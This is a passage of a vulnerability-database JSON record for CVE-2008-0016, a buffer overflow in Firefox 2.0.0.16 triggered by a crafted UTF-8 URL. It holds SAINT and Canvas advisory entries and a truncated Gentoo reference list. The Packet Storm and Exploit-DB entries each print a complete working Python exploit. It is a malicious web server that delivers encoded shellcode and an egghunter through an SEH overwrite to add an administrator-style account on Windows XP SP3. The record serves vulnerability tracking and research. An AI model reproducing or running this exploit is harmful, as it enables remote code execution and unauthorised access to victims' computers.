"id": "JVN:96950482", "href": "http://jvn.jp/en/jp/JVN96950482/index.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "saint": [{"lastseen": "2018-08-31T00:08:20", "references": [], "description": "Added: 12/31/2008 \nCVE: [CVE-2008-0016](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0016>) \nBID: [31397](<http://www.securityfocus.com/bid/31397>) \nOSVDB: [48780](<http://www.osvdb.org/48780>) \n\n\n### Background\n\n[Mozilla](<http://www.mozilla.org>) is a suite of Internet client products available for multiple platforms. \n\n### Problem\n\nA buffer overflow vulnerability in Mozilla Firefox allows command execution when a user follows a link to a specially crafted UTF-8 URL. \n\n### Resolution\n\nUpgrade to [Mozilla Firefox](<http://www.mozilla.com/firefox>) 2.0.0.17 or higher. \n\n### References\n\n<http://www.mozilla.org/security/announce/2008/mfsa2008-37.html> \n\n\n### Limitations\n\nExploit works on Mozilla Firefox 2.0.0.16 and requires a user to load the exploit page in Mozilla Firefox. \n\n### Platforms\n\nWindows \nLinux \nMac OS \n \n\n", "edition": 3, "reporter": "SAINT Corporation", "published": "2008-12-31T00:00:00", "title": "Mozilla Firefox UTF-8 URL buffer overflow", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0016"], "modified": "2008-12-31T00:00:00", "id": "SAINT:0031E27CA856C276125BCE6F9D38D6B6", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/firefox_utf8", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:01:57", "references": [], "description": "Added: 12/31/2008 \nCVE: [CVE-2008-0016](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0016>) \nBID: [31397](<http://www.securityfocus.com/bid/31397>) \nOSVDB: [48780](<http://www.osvdb.org/48780>) \n\n\n### Background\n\n[Mozilla](<http://www.mozilla.org>) is a suite of Internet client products available for multiple platforms. \n\n### Problem\n\nA buffer overflow vulnerability in Mozilla Firefox allows command execution when a user follows a link to a specially crafted UTF-8 URL. \n\n### Resolution\n\nUpgrade to [Mozilla Firefox](<http://www.mozilla.com/firefox>) 2.0.0.17 or higher. \n\n### References\n\n<http://www.mozilla.org/security/announce/2008/mfsa2008-37.html> \n\n\n### Limitations\n\nExploit works on Mozilla Firefox 2.0.0.16 and requires a user to load the exploit page in Mozilla Firefox. \n\n### Platforms\n\nWindows \nLinux \nMac OS \n \n\n", "edition": 1, "reporter": "SAINT Corporation", "published": "2008-12-31T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "saint", "title": "Mozilla Firefox UTF-8 URL buffer overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0016"], "modified": "2008-12-31T00:00:00", "id": "SAINT:7D0E9636DEB46211282EA35A365F6BB0", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/firefox_utf8", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:03", "references": [], "edition": 1, "description": "Added: 12/31/2008 \nCVE: [CVE-2008-0016](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0016>) \nBID: [31397](<http://www.securityfocus.com/bid/31397>) \nOSVDB: [48780](<http://www.osvdb.org/48780>) \n\n\n### Background\n\n[Mozilla](<http://www.mozilla.org>) is a suite of Internet client products available for multiple platforms. \n\n### Problem\n\nA buffer overflow vulnerability in Mozilla Firefox allows command execution when a user follows a link to a specially crafted UTF-8 URL. \n\n### Resolution\n\nUpgrade to [Mozilla Firefox](<http://www.mozilla.com/firefox>) 2.0.0.17 or higher. \n\n### References\n\n<http://www.mozilla.org/security/announce/2008/mfsa2008-37.html> \n\n\n### Limitations\n\nExploit works on Mozilla Firefox 2.0.0.16 and requires a user to load the exploit page in Mozilla Firefox. \n\n### Platforms\n\nWindows \nLinux \nMac OS \n \n\n", "reporter": "SAINT Corporation", "published": "2008-12-31T00:00:00", "type": "saint", "title": "Mozilla Firefox UTF-8 URL buffer overflow", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0016"], "modified": "2008-12-31T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/firefox_utf8", "id": "SAINT:ED19A61689158A534D79EAF5B7A6E24D", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:28", "references": [], "edition": 1, "description": "", "reporter": "Dominic Chell", "published": "2009-09-15T00:00:00", "type": "packetstorm", "title": "Mozilla Firefox 2.0.0.16 Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0016"], "modified": "2009-09-15T00:00:00", "href": "https://packetstormsecurity.com/files/81279/Mozilla-Firefox-2.0.0.16-Buffer-Overflow.html", "id": "PACKETSTORM:81279", "sourceData": "`#!/usr/bin/python \n# FireFox 2.0.0.16 Windows XP SP3 x86 Remote Exploit \n# Author: Dominic Chell <dmc@deadbeef.co.uk> \n# \n# Exploits the UTF-8 URL overflow vulnerability described in CVE-2008-0016. \n# As of September 2009 there are no public exploits for this vulnerability. \n# However, according to securityfocus an exploit is available in both Canvas \n# and Core Impact. \n# \n# Thanks to meta and ChrisA \n \nfrom BaseHTTPServer import HTTPServer \nfrom BaseHTTPServer import BaseHTTPRequestHandler \nimport sys \n \n# Adduser shellcode encoded with shikata_ga_nai \n# USER=r00t PASS=r00tr00t!! \negg = ( \n\"\\xda\\xd4\\x29\\xc9\\xb8\\xb3\\xfe\\x8b\\x54\\xd9\\x74\\x24\\xf4\\xb1\\x32\" \n\"\\x5f\\x83\\xef\\xfc\\x31\\x47\\x14\\x03\\x47\\xa7\\x1c\\x7e\\xa8\\x2f\\xa4\" \n\"\\x81\\x51\\xaf\\xae\\xc7\\x6d\\x24\\xcc\\xc2\\xf5\\x3b\\xc2\\x46\\x4a\\x23\" \n\"\\x97\\x06\\x75\\x52\\x4c\\xf1\\xfe\\x60\\x19\\x03\\xef\\xb9\\xdd\\x9d\\x43\" \n\"\\x3d\\x1d\\xe9\\x9c\\xfc\\x54\\x1f\\xa2\\x3c\\x83\\xd4\\x9f\\x94\\x70\\x11\" \n\"\\x95\\xf1\\xf2\\x46\\x71\\xf8\\xef\\x1f\\xf2\\xf6\\xa4\\x54\\x5b\\x1a\\x3a\" \n\"\\x80\\xef\\x3e\\xb7\\x57\\x1b\\xb7\\x9b\\x73\\xdf\\x04\\x7c\\x4d\\x29\\xea\" \n\"\\xd5\\xc9\\x5e\\xac\\xe9\\x9a\\x21\\x3c\\x81\\xed\\xbd\\x91\\x1e\\x65\\xb6\" \n\"\\x60\\xd8\\xf5\\x06\\x18\\x49\\x92\\x76\\x56\\x6d\\x3d\\x1f\\xfe\\x90\\x4b\" \n\"\\xd1\\xa9\\x93\\xab\\x8d\\x38\\x08\\x1a\\x37\\xba\\xb5\\x42\\x98\\x59\\x16\" \n\"\\xed\\x83\\xe9\\x76\\x84\\x38\\x74\\x05\\x46\\xcd\\x46\\xd9\\xf2\\x11\\xd4\" \n\"\\x29\\xcb\\x25\\x6a\\x7a\\x1b\\xb2\\xab\\x5b\\x7b\\x15\\xea\\xdf\\x3f\\x49\" \n\"\\xca\\xf9\\x9f\\xe7\\x77\\x72\\xc0\\x9b\\x18\\x19\\x61\\x08\\x81\\xaf\\x0e\" \n\"\\xa5\\x3d\\x70\\x90\\x21\\xd0\\x19\\x7c\\xc3\\x59\\xae\\xf2\\x72\\xe9\\x21\" \n\"\\x81\\x07\\x31\\xcc\\x55\\xd8\\x45\\x10\\xb9\\x59\\xe1\\x14\\xc5\\x53\") \n \n# Egghunter where egg is 0x41424142. \n# The egghunter is encoded as HTML entities, this evades the unicode conversion. \n# Egghunter courtesy of skape. Modified to xor edx,edx as first instruction. \nshellcode = ( \n\"툳邐邐䊐橒堂⻍\" \n\"Լ瑚룯䅂䅂懲疯\" \n\"꿪쳌쳌쳌쳌\" \n\"쳌쳌쳌쳌\") \n \n# The UTF-8 character in the URL triggers the code path where the overflow occurs. \ns = \"\\xC3\\xBA\" \nu = unicode(s, \"utf-8\") \nutf8chars = u.encode( \"utf-8\" ) \n \nclass myRequestHandler(BaseHTTPRequestHandler): \n \ndef create_exploit_buffer(self): \nhtml = \"<meta http-equiv=\\\"Content-Type\\\" content=\\\"text/html;charset=utf-8\\\" />\\n<html>\\n<body>\\n\" \n \n# Store the egg and adduser shellcode in CDATA \n# The egghunter will try and find this in memory \nhtml += \"<!CDATA[\" + \"\\x42\\x41\\x42\\x41\\x42\\x41\\x42\\x41\" + egg \nhtml += \"]>\\n\" \n \nhtml += \"<a href=\\\"\" \nhtml += \"\\x01\" \nhtml += \"xx://dmc\" \nhtml += utf8chars \nhtml += \"/\" \n \nhtml += \"邐\" * 1700 # Windows XP SP3 SEH offset \nhtml += \"\u10eb\u9090\" # unicode - ptr to next seh \"\\xeb\\x10\\x90\\x90\"; \nhtml += \"ᇧ怷\" # 0x603711e7 - pop/pop/ret - xpcom_core.dll \nhtml +=\"邐\" * 10 \nhtml += shellcode # add egghunter \nhtml +=\"邐\" * 10 \nhtml += \"\\\" >s</a>\" \nhtml += \"\\n</body>\" \nhtml += \"\\n</html>\" \n \nreturn html \n \ndef do_GET(self): \nself.printCustomHTTPResponse(200) \nif self.path == \"/\": \ntarget=self.client_address[0] \nhtml = self.create_exploit_buffer() \nself.wfile.write(html) \nprint \"[*] Evil payload sent\\n[*] Wait a few minutes and try connecting with r00t/r00tr00t!!\\n\" \n \ndef printCustomHTTPResponse(self, respcode): \nself.send_response(respcode) \nself.send_header(\"Content-type\", \"text/html\") \nself.send_header(\"Server\", \"myRequestHandler\") \nself.end_headers() \n \nprint \"FireFox 2.0.0.16 x86 Exploit\\nAuthor: dmc@deadbeef.co.uk\\n\" \nprint \"[*] Starting evil web server\" \nprint \"[*] Waiting for clients\\n\" \n \nhttpd = HTTPServer(('', 80), myRequestHandler) \n \ntry: \nhttpd.handle_request() \nhttpd.serve_forever() \nexcept KeyboardInterrupt: \nprint \"\\n\\n[*] Interupt caught, exiting.\\n\\n\" \nsys.exit(1) \n \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/81279/mozff20016-overflow.txt"}], "canvas": [{"lastseen": "2016-09-25T14:12:09", "references": [], "description": "**Name**| firefox_utf8 \n---|--- \n**CVE**| CVE-2008-0016 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| firefox_utf8 \n**Notes**| CVE Name: CVE-2008-0016 \nVENDOR: Mozilla \nRepeatability: One Shot \nNote: \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0016 \nDate public: 09/25/2008 \nCVSS: 10.0 \n\n", "edition": 1, "reporter": "Immunity Canvas", "published": "2008-09-24T16:37:04", "title": "Immunity Canvas: FIREFOX_UTF8", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "canvas", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0016"], "modified": "2008-09-24T16:37:04", "id": "FIREFOX_UTF8", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/firefox_utf8", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T11:05:54", "osvdbidlist": ["48780"], "references": [], "description": "Mozilla Firefox 2.0.0.16 UTF-8 URL Remote Buffer Overflow Exploit. CVE-2008-0016. Remote exploit for windows platform", "edition": 1, "reporter": "dmc", "published": "2009-09-14T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "Mozilla Firefox 2.0.0.16 UTF-8 URL Remote Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0016"], "modified": "2009-09-14T00:00:00", "id": "EDB-ID:9663", "href": "https://www.exploit-db.com/exploits/9663/", "sourceData": "#!/usr/bin/python\n# FireFox 2.0.0.16 Windows XP SP3 x86 Remote Exploit\n# Author: Dominic Chell <dmc@deadbeef.co.uk>\n#\n# Exploits the UTF-8 URL overflow vulnerability described in CVE-2008-0016.\n# As of September 2009 there are no public exploits for this vulnerability.\n# However, according to securityfocus an exploit is available in both Canvas\n# and Core Impact.\n#\n# Thanks to meta and ChrisA\n\nfrom BaseHTTPServer import HTTPServer \nfrom BaseHTTPServer import BaseHTTPRequestHandler \nimport sys \n\n# Adduser shellcode encoded with shikata_ga_nai\n# USER=r00t PASS=r00tr00t!!\negg = (\n\t\"\\xda\\xd4\\x29\\xc9\\xb8\\xb3\\xfe\\x8b\\x54\\xd9\\x74\\x24\\xf4\\xb1\\x32\"\n\t\"\\x5f\\x83\\xef\\xfc\\x31\\x47\\x14\\x03\\x47\\xa7\\x1c\\x7e\\xa8\\x2f\\xa4\"\n\t\"\\x81\\x51\\xaf\\xae\\xc7\\x6d\\x24\\xcc\\xc2\\xf5\\x3b\\xc2\\x46\\x4a\\x23\"\n\t\"\\x97\\x06\\x75\\x52\\x4c\\xf1\\xfe\\x60\\x19\\x03\\xef\\xb9\\xdd\\x9d\\x43\"\n\t\"\\x3d\\x1d\\xe9\\x9c\\xfc\\x54\\x1f\\xa2\\x3c\\x83\\xd4\\x9f\\x94\\x70\\x11\"\n\t\"\\x95\\xf1\\xf2\\x46\\x71\\xf8\\xef\\x1f\\xf2\\xf6\\xa4\\x54\\x5b\\x1a\\x3a\"\n\t\"\\x80\\xef\\x3e\\xb7\\x57\\x1b\\xb7\\x9b\\x73\\xdf\\x04\\x7c\\x4d\\x29\\xea\"\n\t\"\\xd5\\xc9\\x5e\\xac\\xe9\\x9a\\x21\\x3c\\x81\\xed\\xbd\\x91\\x1e\\x65\\xb6\"\n\t\"\\x60\\xd8\\xf5\\x06\\x18\\x49\\x92\\x76\\x56\\x6d\\x3d\\x1f\\xfe\\x90\\x4b\"\n\t\"\\xd1\\xa9\\x93\\xab\\x8d\\x38\\x08\\x1a\\x37\\xba\\xb5\\x42\\x98\\x59\\x16\"\n\t\"\\xed\\x83\\xe9\\x76\\x84\\x38\\x74\\x05\\x46\\xcd\\x46\\xd9\\xf2\\x11\\xd4\"\n\t\"\\x29\\xcb\\x25\\x6a\\x7a\\x1b\\xb2\\xab\\x5b\\x7b\\x15\\xea\\xdf\\x3f\\x49\"\n\t\"\\xca\\xf9\\x9f\\xe7\\x77\\x72\\xc0\\x9b\\x18\\x19\\x61\\x08\\x81\\xaf\\x0e\"\n\t\"\\xa5\\x3d\\x70\\x90\\x21\\xd0\\x19\\x7c\\xc3\\x59\\xae\\xf2\\x72\\xe9\\x21\"\n\t\"\\x81\\x07\\x31\\xcc\\x55\\xd8\\x45\\x10\\xb9\\x59\\xe1\\x14\\xc5\\x53\")\n\n# Egghunter where egg is 0x41424142.\n# The egghunter is encoded as HTML entities, this evades the unicode conversion.\n# Egghunter courtesy of skape. Modified to xor edx,edx as first instruction.\nshellcode = (\n\t\"툳邐邐䊐橒堂⻍\"\n\t\"Լ瑚룯䅂䅂懲疯\"\n\t\"꿪쳌쳌쳌쳌\"\n\t\"쳌쳌쳌쳌\")\n\n# The UTF-8 character in the URL triggers the code path where the overflow occurs.\ns = \"\\xC3\\xBA\"\nu = unicode(s, \"utf-8\")\nutf8chars = u.encode( \"utf-8\" )\n\nclass myRequestHandler(BaseHTTPRequestHandler):\n\n\tdef create_exploit_buffer(self):\n\t\thtml = \"<meta http-equiv=\\\"Content-Type\\\" content=\\\"text/html;charset=utf-8\\\" />\\n<html>\\n<body>\\n\"\n\n\t\t# Store the egg and adduser shellcode in CDATA\n\t\t# The egghunter will try and find this in memory\n\t\thtml += \"<!CDATA[\" + \"\\x42\\x41\\x42\\x41\\x42\\x41\\x42\\x41\" + egg\n\t\thtml += \"]>\\n\"\n\n\t\thtml += \"<a href=\\\"\"\n\t\thtml += \"\\x01\"\n\t\thtml += \"xx://dmc\"\n\t\thtml += utf8chars\n\t\thtml += \"/\"\n\t\t\n\t\thtml += \"邐\" * 1700\t# Windows XP SP3 SEH offset\n\t\thtml += \"ძ邐\"\t# unicode - ptr to next seh \"\\xeb\\x10\\x90\\x90\";\n\t\thtml += \"ᇧ怷\"\t# 0x603711e7 - pop/pop/ret - xpcom_core.dll\n\t\thtml +=\"邐\" * 10\n\t\thtml += shellcode # add egghunter\n\t\thtml +=\"邐\" * 10\n\t\thtml += \"\\\" >s</a>\"\n\t\thtml += \"\\n</body>\"\n\t\thtml += \"\\n</html>\"\n\t\n\t\treturn html\n\n\tdef do_GET(self):\n\t\tself.printCustomHTTPResponse(200)\n\t\tif self.path == \"/\":\n\t\t\ttarget=self.client_address[0]\n\t\t\thtml = self.create_exploit_buffer()\n\t\t\tself.wfile.write(html)\n\t\t\tprint \"[*] Evil payload sent\\n[*] Wait a few minutes and try connecting with r00t/r00tr00t!!\\n\"\n\t\t\t\n\tdef printCustomHTTPResponse(self, respcode):\n\t\tself.send_response(respcode)\n\t\tself.send_header(\"Content-type\", \"text/html\")\n\t\tself.send_header(\"Server\", \"myRequestHandler\")\n\t\tself.end_headers()\n\nprint \"FireFox 2.0.0.16 x86 Exploit\\nAuthor: dmc@deadbeef.co.uk\\n\"\nprint \"[*] Starting evil web server\"\nprint \"[*] Waiting for clients\\n\"\n\nhttpd = HTTPServer(('', 80), myRequestHandler)\n\ntry:\n\thttpd.handle_request()\n\thttpd.serve_forever() \nexcept KeyboardInterrupt:\n\tprint \"\\n\\n[*] Interupt caught, exiting.\\n\\n\"\n\tsys.exit(1)\n\n# milw0rm.com [2009-09-14]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9663/"}], "gentoo": [{"lastseen": "2016-09-06T19:46:13", "references": ["https://bugs.gentoo.org/show_bug.cgi?id=404437", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2998", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3073", "https://bugs.gentoo.org/show_bug.cgi?id=312645", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1937", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3665", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0078", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2764", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3650", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1121", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2751", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0177", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1952", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3400", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3661", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1187", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0165", "https://bugs.gentoo.org/show_bug.cgi?id=439586", "https://bugs.gentoo.org/show_bug.cgi?id=324735", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5510", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1307", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1712", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0442", "https://bugs.gentoo.org/show_bug.cgi?id=290892", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1202", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0447", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5354", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3373", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4183", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1392", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5513", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0172", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3958", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1311", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0055", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4208", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1196", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0061", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3002", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0468", "https://bugs.gentoo.org/show_bug.cgi?id=373595", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2654", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2376", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4187", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3966", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4191", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3987", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0479", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3985", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3773", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5842", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4181", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3963", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3984", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1976", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4184", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3655", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1202", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0017", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1962", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2997", "https://bugs.gentoo.org/show_bug.cgi?id=207261", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2065", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3005", "https://bugs.gentoo.org/show_bug.cgi?id=267234", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0473", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0474", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0167", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2988", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4188", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0170", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1309", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0470", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5511", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0775", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2980", "https://bugs.gentoo.org/show_bug.cgi?id=313003", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0457", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0173", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5024", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3004", "https://bugs.gentoo.org/show_bug.cgi?id=261386", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5021", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1973", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0451", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3660", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1834", "https://bugs.gentoo.org/show_bug.cgi?id=305689", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0353", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3076", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3964", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1841", "https://bugs.gentoo.org/show_bug.cgi?id=395431", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3977", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0449", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4067", "https://bugs.gentoo.org/show_bug.cgi?id=257577", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0084", "https://bugs.gentoo.org/show_bug.cgi?id=255687", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3182", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1953", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4205", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0062", "https://bugs.gentoo.org/show_bug.cgi?id=311021", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3767", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1840", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1964", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3069", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2991", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0016", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1197", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0076", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3765", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4180", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2981", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2754", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0065", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3175", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0773", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4066", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0079", "https://bugs.gentoo.org/show_bug.cgi?id=360055", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3994", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3375", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2378", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1970", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2471", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3982", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0163", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0071", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5506", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1994", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3663", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1833", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0160", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5512", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2769", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2477", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2374", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1945", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5015", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5022", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5500", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0648", "https://bugs.gentoo.org/show_bug.cgi?id=348316", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3167", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1972", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1975", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3836", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3981", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3995", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0469", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3962", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3382", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0460", "https://bugs.gentoo.org/show_bug.cgi?id=260062", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1306", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2535", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3654", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0067", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0774", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3972", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1305", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1211", "https://bugs.gentoo.org/show_bug.cgi?id=388045", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3178", 